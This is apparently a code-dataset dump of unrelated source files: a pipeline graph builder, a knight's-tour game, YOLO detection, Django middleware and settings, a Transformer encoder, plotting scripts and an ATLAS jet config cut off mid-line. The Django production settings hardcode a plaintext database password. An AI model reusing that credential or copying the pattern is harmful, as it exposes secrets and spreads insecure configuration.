def _process_entity(self, cls, channel, outchannel, construct_arguments, priority):\n \"\"\"(Pipeline, type(cls), type(channel), type(outchannel),\n type(entity_map)) -> type(cls)\n *Description*\n \"\"\"\n obj = cls(*construct_arguments)\n obj.env = self.env\n if priority:\n obj.priority = priority\n obj.register(self)\n self._entities.append(obj)\n if channel is None and len(obj.input_channels) == 0 and len(obj.output_channels) == 0:\n channel = 'root'\n if channel:\n if outchannel is None:\n outchannel = channel\n if obj.type == 'node':\n obj.input_channels = channel[:1] if isinstance(channel, list) else [channel]\n obj.output_channels = outchannel[:1] if isinstance(outchannel, list) else [outchannel]\n elif obj.type == 'bignode':\n patch_list(obj.input_channels, channel)\n patch_list(obj.output_channels, outchannel)\n elif obj.type == 'source':\n obj.input_channels = []\n patch_list(obj.output_channels, outchannel)\n elif obj.type == 'outlet':\n patch_list(obj.input_channels, channel)\n obj.output_channels = []\n else:\n raise Exception('Well, you use bad type for entity ....')\n return cls\n\n def __call__(self, channel=None, outchannel=None, construct_arguments=(), priority=None):\n \"\"\"(Pipeline, str, str) ->\n type(process_function)\n *Description*\n \"\"\"\n\n def process_function(cls):\n \"\"\"(type(cls)) ->\n type(self._process_entity(cls, channel, outchannel, self._filters))\n *Description*\n :param cls:\n \"\"\"\n cls_mro = inspect.getmro(cls)\n if PipelineEntity in cls_mro:\n self._process_entity(cls, channel, outchannel, construct_arguments, priority)\n return cls\n\n if inspect.isclass(channel) or isinstance(channel, abc.ABCMeta):\n cls = channel\n channel = None\n return process_function(cls)\n\n return process_function\n\n\nclass GraphBuilder:\n\n def __init__(self, entities):\n self.entities = entities\n self.channel_io_nodes = {}\n self.graph = nx.DiGraph()\n pass\n\n def build(self):\n self.graph.add_nodes_from(self.entities)\n self._build_inchannel_connections()\n self._build_multichannel_connections()\n self._validate_external_dependencies()\n return self.graph\n\n def _build_inchannel_connections(self):\n all_channels = set(\n itertools.chain(*map(lambda x: set(itertools.chain(x.input_channels, x.output_channels)), self.entities)))\n for channel in all_channels:\n # Process simple nodes\n channel_nodes = filter(lambda x: x.type == 'node'\n and channel in x.input_channels and channel in x.output_channels,\n self.entities)\n channel_nodes.sort(key=lambda x: (x.priority, x.__class__.__name__))\n self.channel_io_nodes[channel] = {}\n if len(channel_nodes) > 0:\n self.channel_io_nodes[channel]['input'] = channel_nodes[0]\n self.channel_io_nodes[channel]['output'] = channel_nodes[-1]\n # noinspection PyCompatibility\n for i in xrange(0, len(channel_nodes) - 1):\n self.graph.add_edge(channel_nodes[i], channel_nodes[i + 1])\n # Process outlet and source\n input_nodes = filter(lambda x: x.type == 'source' and channel in x.output_channels, self.entities)\n assert len(input_nodes) in (0, 1), 'You can\\'t use many input nodes for one channel'\n if len(input_nodes) > 0:\n if len(channel_nodes) > 0:\n self.graph.add_edge(input_nodes[0], self.channel_io_nodes[channel]['input'])\n else:\n self.graph.add_node(input_nodes[0])\n self.channel_io_nodes[channel]['output'] = input_nodes[0]\n output_nodes = filter(lambda x: x.type == 'outlet' and channel in x.input_channels, self.entities)\n self.graph.add_nodes_from(output_nodes)\n if len(output_nodes) > 0:\n 
self.channel_io_nodes[channel]['outlets'] = output_nodes\n if len(channel_nodes) > 0:\n for output_node in output_nodes:\n self.graph.add_edge(self.channel_io_nodes[channel]['output'], output_node)\n pass\n\n def _build_multichannel_connections(self):\n for node in filter(lambda x: x.type in ('bignode', 'node') and x.input_channels != x.output_channels,\n self.entities):\n for input_channel in node.input_channels:\n self.graph.add_edge(self.channel_io_nodes[input_channel]['output'], node)\n for output_channel in node.output_channels:\n channel_info = self.channel_io_nodes[output_channel]\n if not channel_info.get('input') and not channel_info.get('outlets'):\n raise Exception('You have problem with graph')\n if channel_info.get('input'):\n self.graph.add_edge(node, channel_info['input'])\n if channel_info.get('outlets'):\n for outlet in channel_info.get('outlets'):\n self.graph.add_edge(node, outlet)\n\n def _validate_external_dependencies(self):\n\n pass\n","sub_path":"pandaspipe/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":10315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"507926195","text":"import Tkinter as Tk\n\nclass KnightGame:\n def __init__(self):\n self.canvas_width = 500\n self.canvas_height = 500\n self.tiles = {}\n self.canvas = Tk.Canvas(root, width = self.canvas_width, height = self.canvas_height) \n self.canvas.pack()\n self.currentRow = 0\n self.currentColumn = 0\n def knight_tour(self, n):\n numRows = n\n numColumns = n\n cellWidth = int(self.canvas_width/numColumns)\n cellHeight = int(self.canvas_height/numRows)\n for column in range(numColumns):\n for row in range(numRows):\n x1 = column * cellWidth\n y1 = row * cellHeight\n x2 = x1 + cellWidth\n y2 = y1 + cellHeight\n tile = self.canvas.create_rectangle(x1,y1,x2,y2, fill='white')\n self.tiles[row, column] = tile\n self.canvas.tag_bind(tile, \"<1>\", lambda event, row=row, column=column: self.newTile(row, column)) \n currentTile = self.canvas.itemconfigure(self.tiles[0,0], fill=\"orange\") \n def newTile(self, row, column): #make current tile orange\n tile = self.tiles[row, column]\n tile_color = self.canvas.itemcget(tile, \"fill\")\n new_color = \"orange\"\n old_color = \"blue\"\n dx = abs(row - self.currentRow)\n dy = abs(column - self.currentColumn)\n oldTile = self.tiles[self.currentRow, self.currentColumn]\n #if legal, change to orange & change old tile to blue & push positions to variables row and column \n if (dx==1 and dy==2) or (dx==2 and dy==1):\n self.canvas.itemconfigure(tile, fill=new_color) #change current tile to orange\n self.canvas.itemconfigure(oldTile, fill=old_color) #change old tile to blue\n self.currentRow = row\n self.currentColumn = column\n #if not legal, dont do anything\n else:\n print(\"Illegal move. 
Try again.\")\n\nroot = Tk.Tk()\ngui = KnightGame()\ngui.knight_tour(5) #takes in any value 'n' to make board\nroot.mainloop()\n","sub_path":"knightsTour.py","file_name":"knightsTour.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"298839572","text":"# Import libraries\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport glob\nimport time\n\ndef get_output_layers(net): # Function that reads the label names.\n    layer_names = net.getLayerNames()\n\n    output_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n    return output_layers\ndef draw_prediction(img, class_id, confidence, x, y, x_plus_w, y_plus_h): # Function that draws a bounding box on each image\n    label = str(classes[class_id])\n\n    color = COLORS[class_id]\n\n    cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2)\n\n    cv2.putText(img, label + str(confidence) , (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\ndef drawBox(image, points): # Function that draws the bounding boxes.\n    height, width = image.shape[:2]\n    for (label, xi,yi, wi, hi) in points:\n        center_x = int(xi * width)\n        center_y = int(yi * height)\n        w = int(wi * width)\n        h = int(hi * height)\n        # Rectangle coordinates\n        x = int(center_x - w / 2)\n        y = int(center_y - h / 2)\n        cv2.rectangle(image, (x, y), (x + w, y + h), black, 1)\n    return\ndef savePredict(pathSave, name, text): # Function that saves txt files with the format: label 0.xxxx 0.yyyy 0.wwww 0.hhhhh\n    textName = pathSave + '/' + name + '.txt'\n    with open(textName, 'w+') as groundTruth:\n        groundTruth.write(text)\n        groundTruth.close()\n\npathImg= r\"images-optional\"\n# Path to the image files the model will run object detection on\npathDirection = r\"detection-results\"\n# Path where the model's prediction output is written\nprint(\"start\")\nfor img in glob.glob(pathImg + '/*.jpg'): # load the images in the folder one by one for detection\n    name = img.split('images-optional')[-1].split('.')[0]\n    image = cv2.imread(img)\n    # Read the image\n    Width = image.shape[1]\n    Height = image.shape[0]\n    scale = 0.00392\n    # Read the width and height of the image\n\n    classes = None\n    with open(\"/dia_chi_file/yolo.names\", 'r') as f: # Change the path of the yolo.names file here\n        classes = [line.strip() for line in f.readlines()]\n\n    COLORS = np.random.uniform(0, 255, size=(len(classes), 3))\n    # Random colors for drawing the bounding boxes\n    net = cv2.dnn.readNet(\"yolov3-tiny.weights\", \"yolov3-tiny.cfg\") # Change the name and path of the weights file and cfg file here\n    blob = cv2.dnn.blobFromImage(image, scale, (416, 416), (0, 0, 0), True, crop=False)\n    # convert the image to blob format\n    net.setInput(blob)\n\n    outs = net.forward(get_output_layers(net))\n    #print(outs)\n    class_ids = []\n    confidences = []\n    boxes = []\n    conf_threshold = 0.5 # Detection threshold. An object is only counted as a valid detection if its probability is > 0.5\n    # Lower it if the model does not need high accuracy, raise it if it does\n    nms_threshold = 0.4\n    \n    #start = time.time()\n    for out in outs: # Output the predicted objects\n        for detection in out:\n            scores = detection[5:]\n            class_id = np.argmax(scores)\n            confidence = scores[class_id]\n            if confidence > conf_threshold:\n                #print(confidence)\n                center_x = int(detection[0] * Width)\n                center_y = int(detection[1] * Height)\n                w = int(detection[2] * Width)\n                h = int(detection[3] * Height)\n                x = int(center_x - w / 2)\n                y = int(center_y - h / 2)\n                #print(w,h,x,y)\n                class_ids.append(class_id)\n                confidences.append(float(confidence))\n                boxes.append([x, y, w, h])\n\n    indices = cv2.dnn.NMSBoxes(boxes, confidences, conf_threshold, nms_threshold)\n    # save the txt file\n    Result = \"\"\n    for i in indices:\n        i = i[0]\n        box = boxes[i]\n        x = box[0]\n        y = box[1]\n        w = box[2]\n        h = box[3]\n        textpredict = \"{} {} {} {} {} {}\\n\".format(str(class_ids[i]), confidences[i], x, y, x+w, y+h)\n        Result += textpredict\n    savePredict(pathDirection, name, Result)\n    \n","sub_path":"FinalProject/Code_Evaluate/Detect_By_Yolo_in_Forder.py","file_name":"Detect_By_Yolo_in_Forder.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"89412296","text":"from django.urls import reverse\nfrom django.http import Http404\n\n\nclass RestrictStaffToAdminMiddleware(object):\n    \"\"\"A middleware that restricts access to the administration panels to staff members.\"\"\"\n\n    def __init__(self, get_response):\n        self.get_response = get_response\n\n    def __call__(self, request, *args, **kwargs):\n        if request.path.startswith(reverse('admin:index')):\n            if request.user.is_authenticated:\n                if not request.user.is_staff:\n                    raise Http404\n            else:\n                raise Http404\n        return self.get_response(request)\n\n    def process_request(self, request):\n        if request.path.startswith(reverse('admin:index')):\n            if request.user.is_authenticated():\n                if not request.user.is_staff:\n                    raise Http404\n            else:\n                raise Http404\n","sub_path":"simple_blog/accounts/middleware/restrict_admin_page_middleware.py","file_name":"restrict_admin_page_middleware.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"950185","text":"import torch\nimport torch.nn as nn\nimport math\nfrom .utils.transformer_utils import *\nfrom .embedding.transformer_embedding import *\nfrom .attention.transformer_attention import *\nimport copy\n\ndef clones(module, N):\n    \"Produce N identical layers.\"\n    return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\nclass Encoder(nn.Module):\n    \"Core encoder is a stack of N layers\"\n    def __init__(self, layer, N):\n        super(Encoder, self).__init__()\n        self.layers = clones(layer, N)\n        self.norm = LayerNorm(layer.size)\n    \n    def forward(self, x, mask=None):\n        \"Pass the input (and mask) through each layer in turn.\"\n        for layer in self.layers:\n            x = layer(x, mask)\n        #return self.norm(x).view(x.size(0),-1)\n        return self.norm(x)\n\nclass EncoderLayer(nn.Module):\n    \"Encoder is made up of self-attn and feed forward (defined below)\"\n    def __init__(self, size, self_attn, feed_forward, dropout):\n        super(EncoderLayer, self).__init__()\n        self.self_attn = self_attn\n        self.feed_forward = feed_forward\n        self.sublayer = clones(SublayerConnection(size, dropout), 2)\n        self.size = size\n\n    def forward(self, x, mask=None):\n        
\"Follow Figure 1 (left) for connections.\"\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))\n return self.sublayer[1](x, self.feed_forward)\n\ndef make_model(N,d_model,h,d_ff,seq_len,vocab_size,dropout=0.1):\n '''\n N: number of stack\n d_model: d_model\n h: head\n d_ff: inner hidden layer\n input_size: this is for final DNN\n output_size: this is for final DNN\n '''\n c = copy.deepcopy\n attn = MultiHeadedAttention(h,d_model)\n FFN = PositionwiseFeedForward(d_model,d_ff)\n enc = EncoderLayer(d_model,c(attn),c(FFN),dropout)\n final_encoder = Encoder(enc,N)\n word_embedding = Embeddings(d_model,vocab_size)\n pos_emb = PositionalEncoding(d_model,dropout)\n \n final_model = nn.Sequential(\n final_encoder\n )\n \n for p in final_model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n return final_model,word_embedding,pos_emb","sub_path":"model/encoder/Transformer.py","file_name":"Transformer.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"81960380","text":"\"\"\"\nThis example shows how to read a large text file exported by the Merlin software\nand make our contourf plots.\n\nAuthor: James E. T. Smith \nDate: 3/7/2020\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\n\nfrom msanalysis.data_extraction import read_exported_txt\nfrom msanalysis.plotting.contour import contourf\nfrom msanalysis.data_processing.smoothing import moving_average\nfrom msanalysis.sample_data import get_txt_sample_path\n\n#\n# User defined variables\n#\ntxt_file = get_txt_sample_path()\n# txt_file = \"/home/james/Downloads/1-2260 (all).txt\"\n\n# Set this path to\nmz, intensities = read_exported_txt(txt_file)\nmz_lb, mz_ub = (60, 280)\n\nkeep_ith_scan = 1\nX, Y, Z = contourf(mz, intensities, mz_lb, mz_ub, keep_ith_scan=keep_ith_scan)\n\n#\n# Plot\n#\nplt.figure()\n\n# Plot with NO log scale and NO smoothing\nplt.subplot(3, 1, 1)\nplt.contourf(X * keep_ith_scan, Y, Z)\ncbar = plt.colorbar()\ncbar.ax.set_ylabel(\"Intensity (mV)\", rotation=270, fontsize=12, labelpad=15)\nplt.title(\"Regular Scale and No Smoothing\")\n\n\n# Plot with log scale and NO smoothing\nlog_min = Z.min() * 50\n\nplt.subplot(3, 1, 2)\nplt.contourf(X * keep_ith_scan, Y, Z, norm=colors.LogNorm(vmin=log_min, vmax=Z.max()))\ncbar = plt.colorbar()\ncbar.ax.set_ylabel(\"Log(Intensity)\", rotation=270, fontsize=12)\nplt.title(\"Log Scale and NO Smoothing\")\n\n\n# Plot with log scale AND smoothing\nplt.subplot(3, 1, 3)\nX, Y, Z = contourf(\n mz, moving_average(intensities, n=5), mz_lb, mz_ub, keep_ith_scan=keep_ith_scan\n)\nplt.contourf(X * keep_ith_scan, Y, Z, norm=colors.LogNorm(vmin=log_min, vmax=Z.max()))\ncbar = plt.colorbar()\ncbar.ax.set_ylabel(\"Log(Intensity)\", rotation=270, fontsize=12)\nplt.title(\"Log Scaling and Smoothing\")\n\n\nplt.ylabel(\"MZ\")\nplt.xlabel(\"Scan Number\")\nplt.tight_layout()\nplt.savefig(\"figures/ex4.png\", dpi=600)\nplt.show()\n","sub_path":"examples/04_read_exported_txt.py","file_name":"04_read_exported_txt.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"348028211","text":"\"\"\"\nthis is an example plugin for uranium.\n\nplugins allow additional functionality to be added to uranium.\n\"\"\"\n\n\nclass ExamplePlugin(object):\n\n def __init__(self, uranium, part):\n self.uranium = uranium\n self.part = part\n self.egg_spec = part['versions']\n\n 
def install(self):\n for egg, version in self.egg_spec.items():\n if egg in self.uranium.config.versions:\n continue\n self.uranium.config.versions[egg] = version\n\n update = install\n","sub_path":"uranium/example_plugin.py","file_name":"example_plugin.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"449474001","text":"# Copyright 2015 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE_2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom system_test import testcase\nfrom system_test.tests import ActionTest\nfrom system_test.actions import BaseActions\nfrom system_test.actions import FillRootActions\n\n\n@testcase(groups=['system_test',\n 'system_test.failover',\n 'system_test.failover.filling_root'])\nclass FillRootPrimaryController(ActionTest, BaseActions, FillRootActions):\n \"\"\"Fill root filesystem on primary controller and check pacemaker\n\n Scenario:\n 1. Setup master node\n 2. Config default repositories for release\n 3. Bootstrap slaves and make snapshot ready\n 4. Revert snapshot ready\n 5. Create Environment\n 6. Add nodes to Environment\n 7. Run network checker\n 8. Deploy Environment\n 9. Run network checker\n 10. Run OSTF\n 11. Make or use existing snapshot of ready Environment\n 12. Get pcs initial state\n 13. Fill root filesystem on primary controller\n above rabbit_disk_free_limit of 5Mb\n 14. Check for stopping pacemaker resources\n 15. Run OSTF Sanity and Smoke tests\n 16. Fill root filesystem on primary controller\n below rabbit_disk_free_limit of 5Mb\n 17. Check for stopped pacemaker resources\n 18. Run OSTF Sanity and Smoke tests\n 19. Clean up space on root filesystem on\n primary controller\n 20. Check for started pacemaker resources\n 21. 
Run OSTF Sanity, Smoke, HA\n \"\"\"\n\n actions_order = [\n 'setup_master',\n 'config_release',\n 'make_slaves',\n 'revert_slaves',\n 'create_env',\n 'add_nodes',\n 'network_check',\n 'deploy_cluster',\n 'network_check',\n 'health_check',\n 'save_load_environment',\n 'get_pcs_initial_state',\n 'fill_root_above_rabbit_disk_free_limit',\n 'check_stopping_resources',\n 'health_check',\n 'fill_root_below_rabbit_disk_free_limit',\n 'check_stopping_resources',\n 'health_check',\n 'clean_up_space_on_root',\n 'check_starting_resources',\n 'health_check_sanity_smoke_ha',\n ]\n","sub_path":"system_test/tests/strength/test_filling_root.py","file_name":"test_filling_root.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"190567860","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 16 10:08:37 2018\n\n@author: han-luo\n\"\"\"\n\nfrom __future__ import division\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\n#from matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib.pyplot as plt\nimport argparse\nimport sys\nfrom matplotlib.colors import LinearSegmentedColormap\n\n\ndef getargs():\n\n parser = argparse.ArgumentParser(description=\"Heat Map Plot.\")\n parser.add_argument('-m', '--mode', choices=['A', 'B'],\n help=\"\"\"Mode for data type.\n A means Raw Matrix.\n B means Ternary sparse matrix.\"\"\")\n\n parser.add_argument('-q', '--quantile',\n help='quantile for Max value of Heat Map.')\n parser.add_argument('-i', '--input', help='input file.')\n parser.add_argument('-o', '--out', help='Out put file')\n parser.add_argument('-r', '--resolution',\n help='resolution of HiC Data. Unit:bp')\n parser.add_argument('-p', '--position', default=None,\n help=\"\"\"Positon for each chromosome start.\n if intra-chromosome interaction.\n eg : chr1:250000:chr1:250000\n or chr1:50000000:chr2:35000000\n Unit : bp\"\"\")\n parser.add_argument('-t', '--type', choices=['wholeGenome', 'localGenome'],\n default='wholeGenome',\n help=\"\"\" whether to draw wholeGenome.\"\"\")\n\n parser.add_argument('-c', '--config', default=None,\n help=\"\"\" chromosome Size config file.\n When the type is wholeGenome,config file is necessary\n \"\"\")\n\n args = parser.parse_args()\n\n return args\n\n\ndef LoadData(fil, filetype):\n if filetype == 'A':\n Matrix = np.loadtxt(fil)\n return Matrix\n elif filetype == 'B':\n data_type = np.dtype({'names': ['bin1', 'bin2', 'IF'],\n 'formats': [np.int, np.int, np.float]})\n data = np.loadtxt(fil, dtype=data_type, usecols=[0, 1, 2])\n Matrix = getmatrix(data, 0, max(\n data['bin1'].max(), data['bin2'].max()))\n return Matrix\n else:\n return 0\n\n\ndef getmatrix(inter, l_bin, r_bin):\n inter_matrix = np.zeros((r_bin - l_bin, r_bin - l_bin), dtype=float)\n # Extract the regional data\n mask = (inter['bin1'] >= l_bin) & (inter['bin1'] < r_bin) & \\\n (inter['bin2'] >= l_bin) & (inter['bin2'] < r_bin)\n inter_extract = inter[mask]\n\n # Fill the matrix:\n for i in inter_extract:\n # Off-diagnoal parts\n if i['bin1'] != i['bin2']:\n inter_matrix[i['bin1'] - l_bin][i['bin2'] - l_bin] += i['IF']\n inter_matrix[i['bin2'] - l_bin][i['bin1'] - l_bin] += i['IF']\n else:\n # Diagonal part\n inter_matrix[i['bin1'] - l_bin][i['bin2'] - l_bin] += i['IF']\n\n return inter_matrix\n\n\ndef properU(pos):\n \"\"\"\n Express a genomic position in a proper unit (KB, MB, or both).\n\n \"\"\"\n i_part = int(pos) // 1000000 # Integer Part\n d_part = (int(pos) % 1000000) // 1000 # 
Decimal Part\n\n if (i_part > 0) and (d_part > 0):\n return ''.join([str(i_part), 'M', str(d_part), 'K'])\n elif (i_part == 0):\n return ''.join([str(d_part), 'K'])\n else:\n return ''.join([str(i_part), 'M'])\n\n\ndef LoadConfig(config):\n \"\"\"\n Load the Genome Size file.\n\n \"\"\"\n dtype = np.dtype({'names': ['chr', 'start', 'end'],\n 'formats': ['S16', np.int, np.int]})\n\n data = np.loadtxt(config, dtype=dtype, usecols=[0, 1, 2])\n\n return data\n\n\nif __name__ == '__main__':\n args = getargs()\n infile = args.input\n outfile = args.out\n resolution = int(args.resolution)\n mode = args.mode\n dtype = args.type\n Q = args.quantile\n if dtype == 'localGenome':\n if args.position == None:\n print(\"Positon parameter is necessary\")\n sys.exit(1)\n else:\n Pos = (args.position).split(':')\n else:\n if args.config == None:\n print(\"BinSize file of wholeGenome is necessary\")\n sys.exit(1)\n else:\n config = LoadConfig(args.config)\n\n Matrix = LoadData(infile, mode)\n nonzero = Matrix[np.nonzero(Matrix)]\n vmax = np.percentile(nonzero, Q)\n dtype = args.type\n\n Size = (16, (Matrix.shape[0] / Matrix.shape[1]) * 14)\n\n # Draw\n my_cmap = LinearSegmentedColormap.from_list(\n 'interaction', ['#FFFFFF', '#CD0000'])\n fig, ax = plt.subplots(1, figsize=Size)\n sc = ax.imshow(Matrix, cmap=my_cmap, aspect='auto', interpolation='none',\n extent=(0, Matrix.shape[1], 0, Matrix.shape[0]),\n vmax=vmax, origin='lower')\n if dtype == 'localGenome':\n xticks = list(np.linspace(0, Matrix.shape[1], 5).astype(int))\n xpos = [(int(t) * resolution + int(Pos[1])) for t in xticks]\n xlabels = [properU(p) for p in xpos]\n ax.set_xticks(xticks)\n ax.set_xticklabels(xlabels, size=8)\n\n yticks = list(np.linspace(0, Matrix.shape[0], 5).astype(int))\n ypos = [(int(t) * resolution + int(Pos[3])) for t in yticks]\n ylabels = [properU(p) for p in ypos]\n ax.set_yticks(yticks)\n ax.set_yticklabels(ylabels, size=8)\n\n ax.set_xlabel(Pos[0], labelpad=5, style='italic')\n ax.set_ylabel(Pos[2], labelpad=5, style='italic')\n\n else:\n for i in config['end']:\n ax.axvline(i, ax.get_ylim()[0], ax.get_ylim()[1], linestyle='--',\n color='black', linewidth=0.5)\n ax.axhline(i, ax.get_xlim()[0], ax.get_xlim()[1], linestyle='--',\n color='black', linewidth=0.5)\n ticks = []\n ticklabels = []\n ax.tick_params(axis='both', bottom=False, top=False, left=False,\n right=False, labelbottom=True, labeltop=False,\n labelleft=True, labelright=False)\n for i in config:\n ticks.append((i['start'] + i['end']) // 2)\n ticklabels.append(i['chr'].lstrip('chr'))\n ax.set_xticks(ticks)\n ax.set_xticklabels(ticklabels, size=8)\n ax.set_yticks(ticks)\n ax.set_yticklabels(ticklabels, size=8)\n\n fig.colorbar(sc)\n Dpi = np.ceil(Matrix.shape[0] / Size[0] / 100) * 100\n if Dpi > 300:\n Dpi = 300\n fig.savefig(outfile, dpi=Dpi, transparent=False)\n","sub_path":"src/Script/PlotHeatMap.py","file_name":"PlotHeatMap.py","file_ext":"py","file_size_in_byte":6534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"256523204","text":"from .settings import *\n\nDEBUG = False\n\nALLOWED_HOSTS = ['ubangservice.com', '127.0.0.1']\n\n# SESSION_COOKIE_DOMAIN = 'ubangservice.com'\n\nCORS_ORIGIN_ALLOW_ALL = False\n\n# CACHEOPS_REDIS = \"redis://redis:6379/0\"\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'postgres',\n 'USER': 'postgres',\n 'PASSWORD': 'Z)sOXXcBJ>wi',\n 'HOST': 'db',\n 'PORT': 5432,\n }\n}\n\nJWT_AUTH = {\n 'JWT_EXPIRATION_DELTA': 
datetime.timedelta(days=30),\n # 'JWT_AUTH_COOKIE': 'Access-Token',\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'filters': None,\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n },\n },\n}","sub_path":"backend/backend/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"195831440","text":"# Copyright (C) 2002-2019 CERN for the benefit of the ATLAS collaboration\n\n# JetAlgorithm.py\n#\n# David Adams\n# March 2014\n# October 2014: Update to provide a fn that allow specification of alg sequence.\n#\n# Configure the jet algorithm after the tool manager has been configured.\n\nfrom AthenaCommon import Logging\njetlog = Logging.logging.getLogger('JetRec_jobOptions')\n\n# Record the jet algorithm here.\n# Retrieve this with \"from JetRec.JetAlgorithm import jetalg\" *after*\n# calling addJetRecoToAlgSequence().\njetalg = None\n\n# Function to add jet reconstruction to an algorithm sequence\n# job: algorithm sequence\n# useTruth: Flag to schedule building of selected-truth containers\n# eventShapeTools: Keys for the event shape tools to be run\n# separateJetAlgs: Run JetRecTools in separate algs (experts only)\n# debug: Debug level (0 for quiet). See below.\ndef addJetRecoToAlgSequence(job =None, useTruth =None, eventShapeTools =None,\n separateJetAlgs= None, debug =None):\n\n myname = \"JetAlgorithm: \"\n\n # We need this to modify the global variable.\n global jetalg\n\n # Import message level flags.\n from GaudiKernel.Constants import DEBUG\n\n # Import the jet reconstruction control flags.\n from JetRec.JetRecFlags import jetFlags\n\n # Import the standard jet tool manager.\n from JetRec.JetRecStandard import jtm\n\n # Set sequence and flags as needed.\n if job == None:\n from AthenaCommon.AlgSequence import AlgSequence\n job = AlgSequence()\n if useTruth == None:\n useTruth = jetFlags.useTruth()\n if eventShapeTools == None:\n eventShapeTools = jetFlags.eventShapeTools()\n if eventShapeTools == None:\n eventShapeTools = []\n if separateJetAlgs == None:\n separateJetAlgs = jetFlags.separateJetAlgs()\n\n\n # Event shape tools.\n evsDict = {\n \"emtopo\" : (\"EMTopoEventShape\", jtm.emget),\n \"lctopo\" : (\"LCTopoEventShape\", jtm.lcget),\n \"empflow\" : (\"EMPFlowEventShape\", jtm.empflowget),\n }\n\n if jetFlags.useTracks():\n if jetFlags.useVertices():\n evsDict[\"emtopo\"] = (\"EMTopoOriginEventShape\", jtm.emoriginget)\n evsDict[\"lctopo\"] = (\"LCTopoOriginEventShape\", jtm.lcoriginget)\n else:\n evsDict[\"emtopo\"] = (\"EMTopoOriginEventShape\", jtm.emget)\n evsDict[\"lctopo\"] = (\"LCTopoOriginEventShape\", jtm.lcget)\n jetlog.info( myname + \"Event shape tools: \" + str(eventShapeTools) )\n\n from RecExConfig.AutoConfiguration import IsInInputFile\n for evskey in eventShapeTools:\n from EventShapeTools.EventDensityConfig import configEventDensityTool\n if evskey in evsDict:\n (toolname, getter) = evsDict[evskey]\n if toolname in jtm.tools:\n jetlog.info( myname + \"Skipping duplicate event shape: \" + toolname )\n else:\n jetlog.info( myname + \"Adding event shape \" + evskey )\n if not IsInInputFile(\"xAOD::EventShape\",toolname):\n jtm += configEventDensityTool(toolname, getter.Label, 0.4)\n jtm.allEDTools += [jtm.tools[toolname]]\n else:\n jetlog.info( myname + \"Invalid event shape key: \" + evskey 
)\n raise Exception\n\n # Add the tool runner. It runs the jetrec tools.\n ctools = []\n # Add the truth tools.\n if useTruth: \n from JetRec.JetFlavorAlgs import scheduleCopyTruthParticles\n ctools += scheduleCopyTruthParticles()\n \n # build truth jet input :\n ctools += [ jtm.truthpartcopy, jtm.truthpartcopywz ]\n\n ## if jetFlags.useCells():\n ## ctools += [jtm.missingcells] commented out : incompatible with trigger : ATR-9696\n if jetFlags.useTracks:\n ctools += [jtm.tracksel, jtm.trackselloose_trackjets]\n if jetFlags.useVertices:\n ctools += [jtm.tvassoc]\n \n # LCOriginTopoClusters and EMOriginTopoClusters are shallow copies\n # of CaloCalTopoClusters. This means that if CaloCalTopoClusters gets\n # thinned on output, the the two derived containers need to be thinned\n # in the same way, else they'll be corrupted in the output.\n # FIXME: this should be automatic somehow.\n postalgs = []\n thinneg = False\n from RecExConfig.RecFlags import rec\n if rec.doWriteAOD() and not rec.readAOD():\n from ParticleBuilderOptions.AODFlags import AODFlags\n if AODFlags.ThinNegativeEnergyCaloClusters:\n thinneg = True\n \n if jetFlags.useTracks and jetFlags.useVertices:\n if not IsInInputFile(\"xAOD::CaloClusterContainer\",\"LCOriginTopoClusters\"):\n ctools += [jtm.JetConstitSeq_LCOrigin]\n if thinneg:\n from ThinningUtils.ThinningUtilsConf import ThinNegativeEnergyCaloClustersAlg\n postalgs.append (ThinNegativeEnergyCaloClustersAlg ('ThinNegLCOriginTopoClusters',\n 